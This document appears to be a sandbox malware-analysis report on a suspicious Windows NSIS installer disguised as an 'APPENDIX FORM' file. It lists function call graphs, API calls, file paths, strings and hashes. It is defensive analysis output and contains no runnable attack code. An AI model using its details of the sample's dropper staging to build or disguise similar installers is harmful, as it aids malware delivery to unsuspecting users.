                                                                                                              • Opcode Fuzzy Hash: b64be4ea1155d549a92e54fdb5038b20d055016f2d82b64bdc1b1eb88874929d
                                                                                                              • Instruction Fuzzy Hash: 6851DE70904A04BAEB217A258D45BAF7AB8DF42714F54453BF404762D2C73C4D82EEAE
                                                                                                              Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 701 401f68-401f74 702 401f7a-401f90 call 4029ff * 2 701->702 703 40202f-402031 701->703 713 401f92-401f9d GetModuleHandleA 702->713 714 401f9f-401fad LoadLibraryExA 702->714 704 40217e-402183 call 401423 703->704 710 402894-4028a3 704->710 711 402665-40266c 704->711 711->710 713->714 716 401faf-401fbc GetProcAddress 713->716 714->716 717 402028-40202a 714->717 719 401ffb-402000 call 404fcb 716->719 720 401fbe-401fc4 716->720 717->704 725 402005-402008 719->725 721 401fc6-401fd2 call 401423 720->721 722 401fdd-401ff4 call 100016da 720->722 721->725 733 401fd4-401fdb 721->733 728 401ff6-401ff9 722->728 725->710 726 40200e-402016 call 403709 725->726 726->710 732 40201c-402023 FreeLibrary 726->732 728->725 732->710 733->725
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 00401F93
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000,?), ref: 00405004
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(00402C53,0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000), ref: 00405014
                                                                                                                • Part of subcall function 00404FCB: lstrcatA.KERNEL32(0041F4C0,00402C53,00402C53,0041F4C0,00000000,00000000,00000000), ref: 00405027
                                                                                                                • Part of subcall function 00404FCB: SetWindowTextA.USER32(0041F4C0,0041F4C0), ref: 00405039
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505F
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405079
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405087
                                                                                                              • LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00401FA3
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                                                                              • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 0040201D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                              • String ID: `7B
                                                                                                              • API String ID: 2987980305-3208876730
                                                                                                              • Opcode ID: 0daab70ef89e1fffc4ee8cd0b655ea48e2dbfae681ea0e692f382ac82c4be43c
                                                                                                              • Instruction ID: 4f0a164b3c96300c60f35f0977c0e3ddcb7ae723504d3d42d940096a5cee0e9b
                                                                                                              • Opcode Fuzzy Hash: 0daab70ef89e1fffc4ee8cd0b655ea48e2dbfae681ea0e692f382ac82c4be43c
                                                                                                              • Instruction Fuzzy Hash: CA21EB72D04215FACF207FA48E4DA6E79B0AB4435CF20423BF601B62E0D7BD4942DA5E
                                                                                                              Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133comCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CoCreateInstance.OLE32(00407384,?,?,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208C
                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402145
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen, xrefs: 004020C6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                                              • String ID: C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen
                                                                                                              • API String ID: 123533781-3057813021
                                                                                                              • Opcode ID: 383f66a66d934abd9f3f3178fbf5672efebc84ad60d76e5fc4df36bef25dc3c1
                                                                                                              • Instruction ID: 34466b742f5b7f0ef11a407c973c2c4f52777fa67faea27571742bc3feca770d
                                                                                                              • Opcode Fuzzy Hash: 383f66a66d934abd9f3f3178fbf5672efebc84ad60d76e5fc4df36bef25dc3c1
                                                                                                              • Instruction Fuzzy Hash: 66416BB5A00205BFCB00EFA4CD88E9D7BB6AF88314F204169F905FB2E5DA79D941DB14
                                                                                                              Function 004062BA Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: eadc838c817926bcbe80dad00e1adb541f194e0ade0e3c9be9dd58be48476283
                                                                                                              • Instruction ID: 1e8d97365fb74901917855b8d794782cfd73437813f55072e0905c4e61bb52af
                                                                                                              • Opcode Fuzzy Hash: eadc838c817926bcbe80dad00e1adb541f194e0ade0e3c9be9dd58be48476283
                                                                                                              • Instruction Fuzzy Hash: 41F16771D00229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281D7785A96CF44
                                                                                                              Function 00405FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileA.KERNELBASE(?,00421530,luggages.con,004058A1,luggages.con,luggages.con,00000000,luggages.con,luggages.con,?,?,771B2EE0,004055C0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 00405FEF
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405FFB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                              • String ID: luggages.con
                                                                                                              • API String ID: 2295610775-617196232
                                                                                                              • Opcode ID: 20260570c2d7e465130872416de93bc7e309ed693e48b052a27977fc02f21dff
                                                                                                              • Instruction ID: 1e08b63c4c31002ca59ce0d5230fdf1f863f0ee0e5f08ecdecd469b2b4c040a3
                                                                                                              • Opcode Fuzzy Hash: 20260570c2d7e465130872416de93bc7e309ed693e48b052a27977fc02f21dff
                                                                                                              • Instruction Fuzzy Hash: F0D022319080306BC3004738BC0C84BBA189F15334B528A33B026F22F0E3389C6286ED
                                                                                                              Function 0040600B Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(?,?,?,0040325E,00000008), ref: 0040601D
                                                                                                              • LoadLibraryA.KERNELBASE(?,?,?,0040325E,00000008), ref: 00406028
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406039
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                              • String ID:
                                                                                                              • API String ID: 310444273-0
                                                                                                              • Opcode ID: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                                                                                              • Instruction ID: 10f3e354b7829c8e9003ad98279f9f7bccab2419aed8ef8d4a0e83e21ba2f2d8
                                                                                                              • Opcode Fuzzy Hash: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                                                                                              • Instruction Fuzzy Hash: 13E0CD32D041116BC3109B749D44D3773ACAFD4751305483DF505F2151D734AC11E7A9
                                                                                                              Function 00402647 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 00402656
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFindFirst
                                                                                                              • String ID:
                                                                                                              • API String ID: 1974802433-0
                                                                                                              • Opcode ID: b2468e045f53200862a3d654f355ae0e6101b774f40fc91e5348c45abf24e7e8
                                                                                                              • Instruction ID: d9a307b5197dbc1d43d3591fa654eb399071c8ad99f3bb71004d32988c2edbcd
                                                                                                              • Opcode Fuzzy Hash: b2468e045f53200862a3d654f355ae0e6101b774f40fc91e5348c45abf24e7e8
                                                                                                              • Instruction Fuzzy Hash: 18F0E572508214ABD700EBB49D49AFEB368DB11324F6046BBE101F20C1D6B84A42DB2E
                                                                                                              Function 00403769 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216stringregistrylibraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 113 403769-403781 call 40600b 116 403783-403793 call 405c3e 113->116 117 403795-4037c6 call 405bc7 113->117 125 4037e9-403812 call 403a2e call 40585e 116->125 121 4037c8-4037d9 call 405bc7 117->121 122 4037de-4037e4 lstrcatA 117->122 121->122 122->125 131 403818-40381d 125->131 132 403899-4038a1 call 40585e 125->132 131->132 133 40381f-403843 call 405bc7 131->133 138 4038a3-4038aa call 405d02 132->138 139 4038af-4038d4 LoadImageA 132->139 133->132 142 403845-403847 133->142 138->139 140 403955-40395d call 40140b 139->140 141 4038d6-403906 RegisterClassA 139->141 156 403967-403972 call 403a2e 140->156 157 40395f-403962 140->157 144 403a24 141->144 145 40390c-403950 SystemParametersInfoA CreateWindowExA 141->145 147 403858-403864 lstrlenA 142->147 148 403849-403856 call 40579b 142->148 152 403a26-403a2d 144->152 145->140 149 403866-403874 lstrcmpiA 147->149 150 40388c-403894 call 405770 call 405ce0 147->150 148->147 149->150 155 403876-403880 GetFileAttributesA 149->155 150->132 159 403882-403884 155->159 160 403886-403887 call 4057b7 155->160 166 403978-403995 ShowWindow LoadLibraryA 156->166 167 4039fb-403a03 call 40509d 156->167 157->152 159->150 159->160 160->150 169 403997-40399c LoadLibraryA 166->169 170 40399e-4039b0 GetClassInfoA 166->170 174 403a05-403a0b 167->174 175 403a1d-403a1f call 40140b 167->175 169->170 172 4039b2-4039c2 GetClassInfoA RegisterClassA 170->172 173 4039c8-4039f9 DialogBoxParamA call 40140b call 4036b9 170->173 172->173 173->152 174->157 178 403a11-403a18 call 40140b 174->178 175->144 178->157
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040600B: GetModuleHandleA.KERNEL32(?,?,?,0040325E,00000008), ref: 0040601D
                                                                                                                • Part of subcall function 0040600B: LoadLibraryA.KERNELBASE(?,?,?,0040325E,00000008), ref: 00406028
                                                                                                                • Part of subcall function 0040600B: GetProcAddress.KERNEL32(00000000,?), ref: 00406039
                                                                                                              • lstrcatA.KERNEL32(1033,0041FCE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FCE0,00000000,00000006,C:\Users\user~1\AppData\Local\Temp\,771B3410,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",00000000), ref: 004037E4
                                                                                                              • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry,1033,0041FCE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FCE0,00000000,00000006,C:\Users\user~1\AppData\Local\Temp\), ref: 00403859
                                                                                                              • lstrcmpiA.KERNEL32(?,.exe), ref: 0040386C
                                                                                                              • GetFileAttributesA.KERNEL32(Call), ref: 00403877
                                                                                                              • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry), ref: 004038C0
                                                                                                                • Part of subcall function 00405C3E: wsprintfA.USER32 ref: 00405C4B
                                                                                                              • RegisterClassA.USER32(00422E80), ref: 004038FD
                                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403915
                                                                                                              • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040394A
                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403980
                                                                                                              • LoadLibraryA.KERNEL32(RichEd20), ref: 00403991
                                                                                                              • LoadLibraryA.KERNEL32(RichEd32), ref: 0040399C
                                                                                                              • GetClassInfoA.USER32(00000000,RichEdit20A,00422E80), ref: 004039AC
                                                                                                              • GetClassInfoA.USER32(00000000,RichEdit,00422E80), ref: 004039B9
                                                                                                              • RegisterClassA.USER32(00422E80), ref: 004039C2
                                                                                                              • DialogBoxParamA.USER32(?,00000000,00403AFB,00000000), ref: 004039E1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                              • API String ID: 914957316-2898688249
                                                                                                              • Opcode ID: a3c0fce786b9f42c68720e8c2bfe396006c4e60de18e8b6b2c5074881c4ae853
                                                                                                              • Instruction ID: 57fda68e32d43d3754214604e7ed5e061be8654ed587f540489ffd1693c16f19
                                                                                                              • Opcode Fuzzy Hash: a3c0fce786b9f42c68720e8c2bfe396006c4e60de18e8b6b2c5074881c4ae853
                                                                                                              • Instruction Fuzzy Hash: 6961B3B16442007ED320AF659D45F2B3E6CEB4474AF40457FF944B22E1D7BD6D029A2E
                                                                                                              Function 00402C7B Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 203memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 184 402c7b-402cc9 GetTickCount GetModuleFileNameA call 405971 187 402cd5-402d03 call 405ce0 call 4057b7 call 405ce0 GetFileSize 184->187 188 402ccb-402cd0 184->188 196 402df3-402e01 call 402bdc 187->196 197 402d09-402d20 187->197 189 402f1a-402f1e 188->189 204 402ed2-402ed7 196->204 205 402e07-402e0a 196->205 198 402d22 197->198 199 402d24-402d31 call 4031b8 197->199 198->199 206 402d37-402d3d 199->206 207 402e8e-402e96 call 402bdc 199->207 204->189 208 402e36-402e82 GlobalAlloc call 4060eb call 4059a0 CreateFileA 205->208 209 402e0c-402e24 call 4031ce call 4031b8 205->209 210 402dbd-402dc1 206->210 211 402d3f-402d57 call 40592c 206->211 207->204 235 402e84-402e89 208->235 236 402e98-402ec8 call 4031ce call 402f21 208->236 209->204 232 402e2a-402e30 209->232 216 402dc3-402dc9 call 402bdc 210->216 217 402dca-402dd0 210->217 211->217 230 402d59-402d60 211->230 216->217 223 402dd2-402de0 call 40607d 217->223 224 402de3-402ded 217->224 223->224 224->196 224->197 230->217 234 402d62-402d69 230->234 232->204 232->208 234->217 237 402d6b-402d72 234->237 235->189 243 402ecd-402ed0 236->243 237->217 239 402d74-402d7b 237->239 239->217 242 402d7d-402d9d 239->242 242->204 244 402da3-402da7 242->244 243->204 245 402ed9-402eea 243->245 246 402da9-402dad 244->246 247 402daf-402db7 244->247 249 402ef2-402ef7 245->249 250 402eec 245->250 246->196 246->247 247->217 248 402db9-402dbb 247->248 248->217 251 402ef8-402efe 249->251 250->249 251->251 252 402f00-402f18 call 40592c 251->252 252->189
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00402C8F
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,00000400), ref: 00402CAB
                                                                                                                • Part of subcall function 00405971: GetFileAttributesA.KERNELBASE(?,00402CBE,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,80000000,?), ref: 00405975
                                                                                                                • Part of subcall function 00405971: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405997
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,80000000,?), ref: 00402CF4
                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E3B
                                                                                                              Strings
                                                                                                              • 3h), xrefs: 00402CFC
                                                                                                              • Error launching installer, xrefs: 00402CCB
                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED2
                                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402C88, 00402E53
                                                                                                              • C:\Users\user\Desktop, xrefs: 00402CD6, 00402CDB, 00402CE1
                                                                                                              • C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe, xrefs: 00402C95, 00402CA4, 00402CB8, 00402CD5
                                                                                                              • soft, xrefs: 00402D6B
                                                                                                              • "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe", xrefs: 00402C7B
                                                                                                              • Null, xrefs: 00402D74
                                                                                                              • Inst, xrefs: 00402D62
                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E84
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
